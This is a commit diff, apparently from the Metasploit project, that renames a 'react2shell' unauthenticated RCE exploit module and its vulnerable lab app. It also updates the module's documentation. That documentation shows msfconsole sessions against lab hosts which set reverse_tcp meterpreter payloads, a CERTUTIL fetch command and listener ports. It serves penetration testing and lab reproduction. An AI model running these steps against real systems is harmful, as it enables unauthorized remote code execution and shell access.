rapid7
diff --git a/‎…hell_unath_rce_cve_2025_55102/Dockerfile‎ ‎…ell_unauth_rce_cve_2025_55102/Dockerfile‎data/exploits/react2shell_unath_rce_cve_2025_55102/Dockerfile renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/Dockerfile b/‎…hell_unath_rce_cve_2025_55102/Dockerfile‎ ‎…ell_unauth_rce_cve_2025_55102/Dockerfile‎data/exploits/react2shell_unath_rce_cve_2025_55102/Dockerfile renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/Dockerfile
diff --git a/‎…hell_unath_rce_cve_2025_55102/index.html‎ ‎…ell_unauth_rce_cve_2025_55102/index.html‎data/exploits/react2shell_unath_rce_cve_2025_55102/index.html renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/index.html b/‎…hell_unath_rce_cve_2025_55102/index.html‎ ‎…ell_unauth_rce_cve_2025_55102/index.html‎data/exploits/react2shell_unath_rce_cve_2025_55102/index.html renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/index.html
diff --git a/‎…_unath_rce_cve_2025_55102/next.config.js‎ ‎…unauth_rce_cve_2025_55102/next.config.js‎data/exploits/react2shell_unath_rce_cve_2025_55102/next.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/next.config.js b/‎…_unath_rce_cve_2025_55102/next.config.js‎ ‎…unauth_rce_cve_2025_55102/next.config.js‎data/exploits/react2shell_unath_rce_cve_2025_55102/next.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/next.config.js
diff --git a/‎…ll_unath_rce_cve_2025_55102/package.json‎ ‎…l_unauth_rce_cve_2025_55102/package.json‎data/exploits/react2shell_unath_rce_cve_2025_55102/package.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/package.json b/‎…ll_unath_rce_cve_2025_55102/package.json‎ ‎…l_unauth_rce_cve_2025_55102/package.json‎data/exploits/react2shell_unath_rce_cve_2025_55102/package.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/package.json
diff --git a/‎…h_rce_cve_2025_55102/src/app/actions.tsx‎ ‎…h_rce_cve_2025_55102/src/app/actions.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/actions.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/actions.tsx b/‎…h_rce_cve_2025_55102/src/app/actions.tsx‎ ‎…h_rce_cve_2025_55102/src/app/actions.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/actions.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/actions.tsx
diff --git a/‎…th_rce_cve_2025_55102/src/app/layout.tsx‎ ‎…th_rce_cve_2025_55102/src/app/layout.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/layout.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/layout.tsx b/‎…th_rce_cve_2025_55102/src/app/layout.tsx‎ ‎…th_rce_cve_2025_55102/src/app/layout.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/layout.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/layout.tsx
diff --git a/‎…nath_rce_cve_2025_55102/src/app/page.tsx‎ ‎…auth_rce_cve_2025_55102/src/app/page.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/page.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/page.tsx b/‎…nath_rce_cve_2025_55102/src/app/page.tsx‎ ‎…auth_rce_cve_2025_55102/src/app/page.tsx‎data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/page.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/page.tsx
diff --git a/‎…l_unath_rce_cve_2025_55102/tsconfig.json‎ ‎…_unauth_rce_cve_2025_55102/tsconfig.json‎data/exploits/react2shell_unath_rce_cve_2025_55102/tsconfig.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/tsconfig.json b/‎…l_unath_rce_cve_2025_55102/tsconfig.json‎ ‎…_unauth_rce_cve_2025_55102/tsconfig.json‎data/exploits/react2shell_unath_rce_cve_2025_55102/tsconfig.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/tsconfig.json
diff --git a/‎…_unath_rce_cve_2025_55102/vite.config.js‎ ‎…unauth_rce_cve_2025_55102/vite.config.js‎data/exploits/react2shell_unath_rce_cve_2025_55102/vite.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/vite.config.js b/‎…_unath_rce_cve_2025_55102/vite.config.js‎ ‎…unauth_rce_cve_2025_55102/vite.config.js‎data/exploits/react2shell_unath_rce_cve_2025_55102/vite.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/vite.config.js
diff --git a/‎…/react2shell_unath_rce_cve_2025_55102.md‎ ‎…react2shell_unauth_rce_cve_2025_55102.md‎documentation/modules/exploit/multi/http/react2shell_unath_rce_cve_2025_55102.md renamed to documentation/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55102.md
Lines changed: 20 additions & 20 deletions b/‎…/react2shell_unath_rce_cve_2025_55102.md‎ ‎…react2shell_unauth_rce_cve_2025_55102.md‎documentation/modules/exploit/multi/http/react2shell_unath_rce_cve_2025_55102.md renamed to documentation/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55102.md
Lines changed: 20 additions & 20 deletions
@@ -9,7 +9,7 @@ requests with "__proto__", "constructor", or "prototype" as module names.
 
 ### Linux
 
-1. Open `data\exploits\react2shell_cve_2025_55182` directory
+1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
 2. Build
 ```
 docker build -t react2shell .
@@ -22,7 +22,7 @@ docker run -p 3000:3000 react2shell
 
 ### Windows
 
-1. Open `data\exploits\react2shell_cve_2025_55182` directory
+1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
 2. Build the application
 ```
 npm run build
@@ -38,17 +38,17 @@ npm start
 ### Linux
 
 ```
-msf6 > use multi/http/react2shell_cve_2025_55182
-[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 172.17.0.1
+msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 172.17.0.1
 RHOSTS => 172.17.0.1
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
 RPORT => 3000
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
 LPORT => 6666
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8081
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8081
 FETCH_SRVPORT => 8081
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
 [*] Started reverse TCP handler on 172.17.0.1:6666 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
@@ -67,23 +67,23 @@ Meterpreter  : x64/linux
 ### Windows
 
 ```
-msf6 > use multi/http/react2shell_cve_2025_55182_scanner
-[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 192.168.19.137
+msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102_scanner
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 192.168.19.137
 RHOSTS => 192.168.19.137
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
 RPORT => 3000
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
 LPORT => 6666
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8082
-FETCH_SRVPORT => 8082
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set target 1
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set target 1
 target => 1
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
 payload => cmd/windows/http/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_COMMAND CERTUTIL
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8082
+FETCH_SRVPORT => 8082
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_COMMAND CERTUTIL
 FETCH_COMMAND => CERTUTIL
-msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
+msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
 
 [*] Started reverse TCP handler on 192.168.19.130:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)